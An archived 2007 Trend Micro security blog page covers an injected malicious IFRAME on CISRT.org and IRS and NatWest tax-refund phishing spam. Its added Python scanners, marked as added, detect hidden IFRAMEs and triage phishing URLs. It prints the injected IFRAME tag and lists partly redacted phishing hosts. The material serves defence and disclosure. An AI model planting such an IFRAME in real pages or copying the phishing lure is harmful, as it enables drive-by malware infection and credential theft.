
Archive for October 2nd, 2007


Oct 2
by Ivan Macalintal (Advanced Threats Researcher)

China is on a seven-day holiday, but the Chinese Internet Security Response Team (CISRT) folks may opt to go to work instead because of an issue that has recently plagued their website: a malicious IFRAME tag has wormed its way into CISRT.org’s pages.

Compromised CISRT Web page

We checked the following three CISRT pages and have confirmed that the IFRAME tag exists on all of them:

http:// www. cisrt.org/enblog/read.php?172
http:// www. cisrt.org/enblog/
http:// www. cisrt.org/

*spaces included to prevent accidental clicking. For now (until the sites have been cleaned), users are advised to practice caution when browsing these sites.

The IFRAME, found at the top of each of these pages, is:

<iframe src=http://mms.{BLOCKED}mmn.com/99916.htm width=0 height=0 frameborder=0></iframe>

Links to these CISRT pages posted on some tech-news sites therefore also lead readers to the compromised content.

The injected IFRAME loads a page that in turn loads scripts and further IFRAMEs, which eventually download, install and execute a Trojan downloader with the file name sms.exe. This downloader then fetches more malicious code onto the infected system.
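
A zero-size IFRAME inserted at the top of a page, pointing at a host the site does not own, is a pattern a site owner can scan for. The following is an added example, not code from the original post or from Trend Micro: it parses a page with Python's html.parser and reports every IFRAME that is sized to (almost) nothing or styled invisible, adding an off-site note when its src points away from the host that served the page. The sample HTML and the host name mms.example-blocked.com are constructed; the real injected host is redacted on this page.

```python
"""Find hidden, off-site IFRAMEs of the kind injected into the CISRT pages.

Added example, not code from the original post or from Trend Micro. The
HTML below is constructed to mimic the compromise described above: a
zero-size IFRAME inserted at the top of an otherwise normal page. The
host name mms.example-blocked.com stands in for the redacted real host.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

SAMPLE_PAGE = """<html><head><title>Constructed sample page</title></head>
<body>
<iframe src=http://mms.example-blocked.com/99916.htm width=0 height=0 frameborder=0></iframe>
<div id="content">
<p>Normal page content.</p>
<iframe src="http://www.cisrt.org/enblog/sidebar.html" width="200" height="400"></iframe>
<iframe src="http://video.example.net/embed/1" width="425" height="350"></iframe>
</div>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            # html.parser lowercases tag and attribute names; values may be None
            # for valueless attributes, so normalise those to "".
            self.iframes.append({name: (value or "") for name, value in attrs})


def _dimension(attrs, name):
    """Integer pixel value of width/height, or None if absent or not a plain number."""
    raw = attrs.get(name, "").strip().lower()
    if raw.endswith("px"):
        raw = raw[:-2]
    return int(raw) if raw.isdigit() else None


def is_hidden(attrs):
    """True when the frame is sized to nothing (<= 1px) or styled invisible."""
    for name in ("width", "height"):
        size = _dimension(attrs, name)
        if size is not None and size <= 1:
            return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def find_suspicious_iframes(html, page_host):
    """Return [(src, reasons)] for every hidden IFRAME in `html`.

    `page_host` is the host that served the page. A hidden frame whose src
    points at a different host gets an extra "off-site:<host>" reason,
    which is exactly the injection pattern described in the post. Visible
    frames, even off-site embeds, are left alone: hiding is the
    discriminator, not the cross-site source by itself.
    """
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        if not is_hidden(attrs):
            continue
        src = attrs.get("src", "")
        reasons = ["hidden"]
        frame_host = (urlparse(src).hostname or "").lower()
        if frame_host and frame_host != page_host.lower():
            reasons.append("off-site:" + frame_host)
        findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(SAMPLE_PAGE, "www.cisrt.org"):
        print(src, ", ".join(reasons))
```

Run against the constructed page, only the zero-size frame is reported, tagged both hidden and off-site; the visible sidebar and video embeds are ignored. Injected frames are also commonly hidden via `style="display:none"` or placed off-screen with negative margins, so a production scanner should treat the size and style checks here as a starting point, not a complete list.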

Trend Micro has already communicated with the good folks at CISRT about this incident. Please stay tuned for more updates regarding this issue.

UPDATE: (2:50 PM, October 2, 2007, GMT -08:00)

It seems the CISRT English Blog page has now been cleaned, but the main page is still hosting the malicious IFRAME.

UPDATE:

Trend Micro already detects the related codes for the compromised sites as HTML_IFRAME.HS and WORM_FUBALCA.AQ.

Trend Micro users are advised to download the latest pattern file to avoid getting infected by these threats.


Oct 2
by Roderick Ordoñez (Technical Communications)

The IRS is reportedly offering a refund just for filling in the details of an online form. Sounds too good to be true, doesn’t it?

It is. Clicking the “click here” link actually redirects users to one of the following phishing sites. Luckily, all of them are inactive as of this writing:

* http://www.{BLOCKED}ton.com/bridge/feedback.php
* http://{BLOCKED}tack.net/catalog/images/awstats/.stats/.secure/.server/.refund/login.html
* http://{BLOCKED}ab.hoseo.ac.kr:8080/Refund.html
* http://www.{BLOCKED}ho.ch/Tcho.chindex/jpg/not.php
* http://www.{BLOCKED}-let-go.net/gallery/include/help.php
* http://{BLOCKED}aintball.spb.ru/install/what.php
* http://{BLOCKED}anna.info/modules/www.irs.gov/
* http://{BLOCKED}0-167-2-130.sd.sd.cox.net/help/feedback.php
* http://{BLOCKED}anna.info/gallery/lang/irs.php
* http://www.{BLOCKED}an.agri-jahad.ir:84/IRS/redirect.html
* http://www.{BLOCKED}ive.com/doowop/best-of-doowop/_vti_cnf/images/images.php
* http://{BLOCKED}o.com/**http://61.74.158.71/recicler.php
* http://{BLOCKED}amnet.nfshost.com/gallery/themes/water_drop/images/.database/index.php
* http://www.{BLOCKED}e.ru/lang/index.php
* http://www.{BLOCKED}hunter.ru/img/help.php
* http://{BLOCKED}.{BLOCKED}.18.110:84/IRS.gov/
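
The URLs in the list share a handful of shapes that can be checked mechanically: the brand name (irs, IRS.gov) placed in the path rather than in the owning domain, hidden dot-directories such as /.stats/.secure/, non-standard ports (:8080, :84), a raw IP address as the host, a second URL embedded in the path (the first site is only a redirector), and landing pages buried inside the directory tree of some unrelated web application, which points at a compromised third-party site. The following is an added example, not code from the original post or from Trend Micro, that turns those observations into a URL triage function. The sample URLs are constructed to mirror the shapes above, with the redacted hosts replaced by example.* names and TEST-NET addresses; the brand table and the directory list are assumptions.

```python
"""Triage URLs for the phishing indicators visible in the IRS list above.

Added example, not code from the original post or from Trend Micro. The
sample URLs are constructed to mirror the shapes in that list, with the
redacted hosts replaced by example.* names and TEST-NET addresses; none
of them is a real phishing site. PROTECTED_BRANDS and WEBAPP_DIRS are
assumptions chosen for this example.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Impersonated brand token -> registrable domain that legitimately owns it.
PROTECTED_BRANDS = {"irs": "irs.gov", "natwest": "natwest.com"}

# Directory names typical of a legitimate web application that has been
# compromised and is now hosting the phishing page (shapes seen above).
WEBAPP_DIRS = {"gallery", "modules", "themes", "awstats", "_vti_cnf",
               "images", "include", "install", "lang", "catalog"}

SAMPLE_URLS = [
    "http://example.net/catalog/images/awstats/.stats/.secure/.server/.refund/login.html",
    "http://lab.example.edu:8080/Refund.html",
    "http://example.info/modules/www.irs.gov/",
    "http://www.example.ir:84/IRS/redirect.html",
    "http://example.com/**http://192.0.2.71/recicler.php",
    "http://192.0.2.110:84/IRS.gov/",
    "http://www.irs.gov/individuals/refunds",  # legitimate: no indicators
]


def _token_present(token, text):
    """Whole-token match, so 'irs' does not fire on 'first'."""
    pattern = r"(?<![a-z0-9])%s(?![a-z0-9])" % re.escape(token)
    return re.search(pattern, text) is not None


def _owns(host, domain):
    """True when `host` is `domain` itself or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def phish_indicators(url):
    """Return the indicator names that fire for `url`, in a fixed order."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path.lower()
    indicators = []

    # Brand token in the path or a subdomain, but the host is not the owner.
    for brand, owner in PROTECTED_BRANDS.items():
        if not _owns(host, owner) and (_token_present(brand, path) or _token_present(brand, host)):
            indicators.append("brand_spoof:" + brand)

    # Hidden directories such as /.stats/.secure/.server/.refund/.
    if re.search(r"/\.[^/]+", path):
        indicators.append("dot_directory")

    # Anything other than the default HTTP/HTTPS ports.
    if parts.port not in (None, 80, 443):
        indicators.append("nonstandard_port:%d" % parts.port)

    # A bare IP address where a hostname is expected.
    try:
        ipaddress.ip_address(host)
        indicators.append("ip_host")
    except ValueError:
        pass

    # A second URL smuggled into the path or query: the site is a redirector.
    if re.search(r"https?://", path + "?" + parts.query):
        indicators.append("embedded_url")

    # Landing page buried inside a common web application's directory tree.
    if WEBAPP_DIRS.intersection(segment for segment in path.split("/") if segment):
        indicators.append("webapp_directory")

    return indicators


def triage(urls):
    """Map each URL to its indicators; an empty list means nothing fired."""
    return {url: phish_indicators(url) for url in urls}


if __name__ == "__main__":
    for url, hits in triage(SAMPLE_URLS).items():
        print("%-85s %s" % (url, ", ".join(hits) or "-"))
```

These are triage signals, not verdicts. A single weak indicator such as webapp_directory (every site has an /images/ directory) should only raise priority for a closer look, while a brand token outside the owning domain, or a second URL embedded in the path, is worth acting on by itself; the legitimate www.irs.gov URL in the sample set produces no indicators at all.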

Believed to have been making the rounds since late last August, this is yet another spammer’s ploy to phish for the account details of unsuspecting users. Though the IRS itself has warned the public repeatedly that it does not make contact through email, spammers are still using the tried-and-tested “authority” model as a social-engineering technique to trick users into giving up sensitive information. Add a little monetary reward and someone is bound to take the bait.

This particular fake IRS spam blast was created using a rock-phishing kit that is still available in an open directory on one of the known phishing domains. Other subject lines used in this spam run include:

* Notification - Fiscal Activity (Tax Refund)
* IRS Notification - Fiscal Activity
* Notification of Tax Refund on your VISA or MasterCard Now
* Urgent Notification !
* IRS Notification - Tax Refund Online Form

Not too long ago, spammers used the IRS angle to scare people into opening a malicious .PDF file, which actually turned out to be TROJ_ARTIEF.B in disguise. Other malware families, BAGLE variants in particular, are also notorious for using tax as the main theme of their spam.

A similar incident, also believed to have been created using a rock-phishing kit, has hit the NatWest online banking site. See the screenshot below:

The following sites were seen to be hosting these phishing scams:

* {BLOCKED}opoe5.cn
* {BLOCKED}opoe4.cn
* {BLOCKED}opoe3.cn
* {BLOCKED}opoe2.cn
* {BLOCKED}opoe1.cn
* {BLOCKED}nigor5.cn
* {BLOCKED}nigor4.cn
* {BLOCKED}nigor3.cn
* {BLOCKED}nigor2.cn
* {BLOCKED}nigor1.cn
* {BLOCKED}elstrom5.cn
* {BLOCKED}elstrom4.cn
* {BLOCKED}elstrom3.cn
* {BLOCKED}elstrom2.cn
* {BLOCKED}elstrom1.cn
* {BLOCKED}niole2.cn
* {BLOCKED}otpor1.cn
* {BLOCKED}opyor1.cn
* {BLOCKED}oporr1.cn
* {BLOCKED}opo6r1.cn
* {BLOCKED}opo4r1.cn
* {BLOCKED}opo3r1.cn
* {BLOCKED}opo2r1.cn
* {BLOCKED}opo1r1.cn
* {BLOCKED}op5or1.cn
* {BLOCKED}7opor1.cn
* {BLOCKED}lopor1.cn
* {BLOCKED}lopor1.cn
* {BLOCKED}lopor1.cn
* {BLOCKED}ker17.cn
* {BLOCKED}ker15.cn
* {BLOCKED}ker13.cn
* {BLOCKED}ker12.cn
* {BLOCKED}p1209.cn
* {BLOCKED}5p1209.cn
* {BLOCKED}3p1209.cn
* {BLOCKED}1p1209.cn
* {BLOCKED}op1209.cn
* {BLOCKED}op1209.cn
* {BLOCKED}op1209.cn
* {BLOCKED}op1209.cn

Always keep in mind that government agencies do not initiate contact by email, much less ask for personal data through it; email is simply too insecure for that. If you receive an email like this, it is best to look the agency up in the yellow pages and call it yourself, or drop by in person.

Who knows? You may have just saved yourself from more than a promised rebate.

Additional information provided by Elizabeth Bookman.



© Copyright 2008 Trend Micro Inc. All rights reserved.